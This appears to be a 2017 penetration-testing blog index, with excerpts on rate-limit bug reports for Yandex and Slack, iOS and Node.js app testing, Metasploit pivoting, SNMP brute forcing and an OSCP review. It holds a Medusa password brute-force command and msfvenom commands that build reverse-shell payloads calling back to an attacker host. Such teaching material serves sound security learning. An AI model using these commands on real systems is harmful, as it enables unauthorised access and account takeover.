Tuesday, 26 September 2017

Yandex IMAP Brute Forcing(No Rate Limit For Login Attempts)

Hello Guyzssss,

I am not in bug bounty so much, But while using one of the yandex service, I found that there was no Rate Limit Deployed for login attempts on their IMAP Authentication.

Means user can perform multiple attempts on their IMAP Service, Which is responsible to access yandex mail on other accounts.Just like others.

Like gmail users can import yandex emails(Account) using IMAP Authentication.

Sunday, 23 April 2017

Pentesting Node.js Application : Nodejs Application Security

Pentesting Node.js Application : Nodejs Application Security

Hello folks, Today we will see how we can do Pentesting Of NodeJS Application : Attacking NodeJS Application.

As we know that Javascript is a very common and important language and also a light wight which do our most of task very easily.

But we also know that, Great efficiency comes with great risk. Node JS is a kind of server side programming language derived from JS.

According to Wiki

Node.js is an open-source, cross-platform JavaScript run-time environment for executing JavaScript code server-side. Historically, JavaScript was used primarily for client-side scripting, in which scripts written in JavaScript are embedded in a webpage's HTML, to be run client-side by a JavaScript engine in the user's web browser. Node.js enables JavaScript to be used for server-side scripting, and runs scripts server-side to produce dynamic web page content before the page is sent to the user's web browser. Consequently, Node.js has become one of the foundational elements of the "JavaScript everywhere" paradigm,[4] allowing web application development to unify around a single programming language, rather than rely on a different language for writing server side scripts.

Today we will see some of the vulnerabilities which can be exploited in Node.JS application. We will also take a look on the source code for better understanding.

iOS Application Pentesting Part 5 : Insecure HTTP Data Transit

Just like Transmitting Sensitive Credentials Over HTTP, Application which used HTTP to communicate with their server and don`t using any kind of encryption are vulnerable to this issues.

In iGoat application, there is a simple demonstration that username & password passed in application is transmitting over http and without any encryption as result an attacker can capture/sniff those packages and could hijack victim`s account.

Sunday, 16 April 2017

iOS Application Pentesting Part 4 : Installing iGoat Application

Picture taken from : https://www.owasp.org/index.php/OWASP_iGoat_Project

To perform hands on practice and learning we will use iGoat iOS Application part of OWASP Security Project. You can find their Github page here. This Mobile Application is designed as vulnerable for Security Professionals and learner to enhanced their Skills over iOS Application Pentesting.

This project is Maintained by following folks.

Here is the Project Details

For later practices we will install this application XCode and run it, But i recommended you to use a Physical device while performing pentesting.

Thursday, 13 April 2017

iOS Application Pentesting Part 3 : Extracting iOS App Class Information

Every application has his own group of codes which contents lots of information about the functionality and so on. It will always better if we can extract all the possible information about our application which we are going to attack.

Toady we will see How to Extract Class Information Of iOS Application.

Apple has made some modification in their security and now days most the app store apps are encrypted which first need to decrypt to extract class information.

So first we will see class dumping of non-encrypted apps.

Dumping Class Information Of Pre-Installed Applications
We have 2 ways the find the app.
1) find / -type d -iname "Dam*.app"
2) If the app is customly installed using IPA file then his save directory would be Applications/

I am using the command line search for Damm Vulnerable iOS Application which is developed by  Prateek Gianchandani.

iOS Application Pentesting Part 2 : iOS Application Basics

In todays post, we will see iOS Application. Knowing our enemy before attacking is very important for us ;)

iOS : If i can say in simple words, Its an Operating System which run various iDevices which is create By Apple Inc.

iOS (formerly iPhone OS) is a mobile operating system created and developed by Apple Inc. exclusively for its hardware. It is the operating system that presently powers many of the company's mobile devices, including the iPhone, iPad, and iPod Touch. It is the second most popular mobile operating system globally after Android. iPad tablets are also the second most popular, by sales, against Android since 2013.[9]

Tuesday, 11 April 2017

iOS Application Pentesting Part 1 : Setting Up The Attacking Environment

iOS Application Pentesting Part 1 : Introduction To iOS 

In this article, we will see essentials tools and environment which we required to perform penetration testing and Vulnerability assessment on iOS Applications.

JailBreaking Your Device : ;) 

First thing first, if you are very serious about iOS Application Pentesting then you should required a Jailbroken device with you.
Below we will see how we can JailBreak a iOS Device.
iOS JailBreaking have a great history, First pangu have Jailbroke the iOS then other team did the same.
Be frank to Jailbrea iOS device, First you need to check whether your Installed iOS Version is already JailBroken or not. 

Note - For this particular tutorial we will use Xcode Simulator but highly recommended you to get A Jailbreak Device if you are very serious about learning iOS Application Pentesting.

Slack Rate Limit Bypass

Slack Rate Limit Bypass

First of all, Thanks to all readers for the appreciation got in my inbox.

Today we will see, How i was able to Bypass The Rate Limit Implemented In Slack for preventing automated/brute force attempts.

Rate limit is now days a very common things, They can be found every where.Usually rate limit are deployed to prevent automated and brute force attempts, Such as brute forcing OTP (One Time Password) & User Account Passwords. 

From recent months, I was working on Slack Bug Bounty Program and y god grace got more then 15 valid vulnerabilities till today(Some of the still in fixing stage). One of the interesting vulnerability was Slack Rate Limit Bypass. 

First of all, I was reported  No Rate Limit Implemented Vulnerability On Slack(Which was not true) :p In slack Mobile Applications End-Point "/api/auth.signin" , I was looking for positive response from slack guys, Next day slack replied that my report is not proper as they have rate limit implemented. Now what was wrong?

Exploiting Software Based Vulnerabilities : Attacking Network - Pentesting Network

Exploiting Software Based Vulnerabilities : Attacking Network - Pentesting Network 

Vulnerabilities exist on a particular machine can be software and hardware based. Today we will see how we can Exploit Software Based Vulnerabilities to take over target machine.

Software based vulnerabilities are nothing, but just a coding/programming error exist in a Particular software version or series. Which can be hacked/compromise using a group of malicious code called as an "Exploit".

First we have identified a SMTP service on our target machine

SLmail smtpd 5.5.0 4433 is running in port 25 

Monday, 10 April 2017

Metasploit Pivoting And Port Forwarding : Attacking Network - Pentesting Network

Metasploit Pivoting And Port Forwarding : Attacking Network - Pentesting Network 

Metasploit pivot technique helps an attacker to Compromise the other Machines which attacker don`t have access to.

So the scenario would be like below.

Attacker: 192.168.23.X
Attacker Can Communicate With System A: 192.168.31.X
A System Can Only Communicate With B System : 10.1.1.X
Attacker Wants To Communicate With Other Systems Using System B.
We also consider that, attacker dont have idea about the System C IP Address.

Pivoting can be achieved in below steps.

Pivoting can be perform in following steps:
  1. Compromise primary target machine (System A)
  2. Search for System network interfaces.
  3. Add route to metasploit session of System A.
  4. Run Proxy server
  5. Scan the Second target machine (System B)
  6. Port forwarding
  7. Perform Exploit

Hacking SNMP Service Part 2 - The Post Exploitation : Attacking Network - Network Pentesting

Hacking SNMP Service Part 2 - The Post Exploitation : Attacking Network - Network Pentesting

From our previous post, We have identified the community strings Via Nmap Scan & Brute Forcing the Community String Values.

Now we will see, How can we use those Extracted Community strings for Post Exploitation.

To perform We will use various tools as mention below.

What Is MIB in SNMP

The SNMP Management Information Base (MIB) is a database containing information
usually related to network management. The database is organized like a tree, where
branches represent different organizations or network functions. The leaves of the tree
(final endpoints) correspond to specific variable values that can then be accessed, and
probed, by an external user. To read more about the MIB tree, refer to the following

For example, the following MIB values correspond to specific Microsoft Windows
SNMP parameters.        System Processes     Running Programs     Processes Path     Storage Units     Software Name      User Accounts        TCP LocalPorts

Hacking SNMP Service Part 1 - The Post Exploitation : Attacking Network - Network Pentesting

Hacking SNMP Service Part 1 - The Post Exploitation : Attacking Network - Network Pentesting

SNMP (Simple Network Management Protocol)

Simple Network Management Protocol (SNMP) is a popular protocol for network management. It is used for collecting information from, and configuring, network devices, such as servers, printers, hubs, switches, and routers on an Internet Protocol (IP) network.

With lots of usability, SNMP can be used by an attacker to compromise the services and IT infrastructure as well. which will cover later.

Now we will see how we can brute force the SNMP Services Community Strings.

But Why Crack SNMP Community Strings

The SNMP Read-Only Community String is like a user id or password. It is sent along with each SNMP Get-Request and allows (or denies) access to a router's or other device's statistics. If the community string is correct, the device responds with the requested information. If the community string is incorrect, the device simply ignores the request and does not respond.

What We Can Do By Community Strings.

Default community strings are "public" & "private" with "ro" (Read Only) & "rw" (Read & Write).
As it clear indicates, that Read only means user can only read the information & Read and Write means user can write/update the information present in SNMP.

Sunday, 9 April 2017

Cracking SSH FTP HTTP FTP : Attacking Network - Network Pentesting

Cracking SSH FTP HTTP FTP : Attacking Network - Network Pentesting

Apart from using Default Credentials, we can also perform a brute force attack on various services to get into them.

1) HTTP (htaccess protected web directory) 

Medusa comes in rescue when we talk about Basic Authorization or Password Protected Web Directory Cracking

Medusa commmand line to For Cracking Basic Authorization or Password Protected Web Directory

 medusa -h -u admin -P Desktop/demo/password -M http -m DIR:/secret-T 10

Medusa will go ahead and try Crack Password Protected Web Directory by using user as admin and password as provide in password list on Password Protected Web Directory secret. 

Default Credentials Vulnerability : Attacking Network - Network Pentesting

Default Credentials Vulnerability : Attacking Network - Network Pentesting

Hello reader, We have talked lots of about Web Hacking & today i decided to blog some intresting things about Attacking Network - Network Pentesting.

For your information, for demonstration purpose i am using Vyatta VM, which you can also download from http://packages.vyos.net/iso/release/1.1.7/ 

Today we will see the common vulnerability which most of admin do, by keeping default configuration or you can also say keeping default credentials.

So we have a Target machine on & our Attacking Machine on

Lets do a Nmap Service Scan on our target machine.

nmap -sV 

So we got some information like port 22, 23, 80 & 443.
Apart from all port, 22 & 23 looks interesting for us and it might possible that credentials would be default for that service. 

Generating Metasploit Payloads : Creating Metasploit Reverse Shell

Generating Metasploit Payloads : Creating Metasploit Reverse Shell

Below is the different type of Metasploit Payloads we can use while to get the reverse shell of victim machine.

These exploit can be used in metasploit by using set payload "payloadnae" and before it we have to set multi handler which can be configured by use exploit/multi/handler

Mention payloads require certain inputs as an option such as LHOST, LPORT.

Operating System Based Bionaries Shell


msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -elf shell.elf

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f exe > shell.exe

msfvenom -p osx/x86/shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f macho > shell.macho

Web Payloads : Usually For RFI, SQL Injection

Wednesday, 5 April 2017

Penetration Testing with Kali Linux OSCP Review and Course, Lab experience — My OSCP Review :Try Harder! ;)

 Penetration Testing with Kali Linux OSCP Review and Course, Lab experience — My OSCP Review :Try Harder! ;) 

Gaining the OSCP certification is a challenge like no other. After my experience with the OSCP exam course from Offensive Security, I decided to go ahead and write an OSCP Review. I registered for this course in July 2015 and choose 90 Days lab. Within a week I received Mail from Offensive Security regarding VPN Access, Course Material all etc.
OSCP is a combination of Network, System & Web Hacking also a medium part of Exploit Writing, where you have to write an exploit for a particular vulnerable software.
Who am I:
For those who doesn’t know me .My name is Narendra Bhati, working @Suma Soft Ptv. Ltd. As Security Analyst. I have 3+ years of experience in Application VAPT. I am also bug bounty hunter and doing it from last 3 years. Yes lots of money ;) apart from salary.
About The OSCP Course:

Featured post

cPanel WebDisk Android App 4.0 : Backup Vulnerability

cPanel WebDisk Android App 4.0 : Backup Vulnerability Hello folks, This vulnerability is regarding an Insecure Data Storage ...

Popular Posts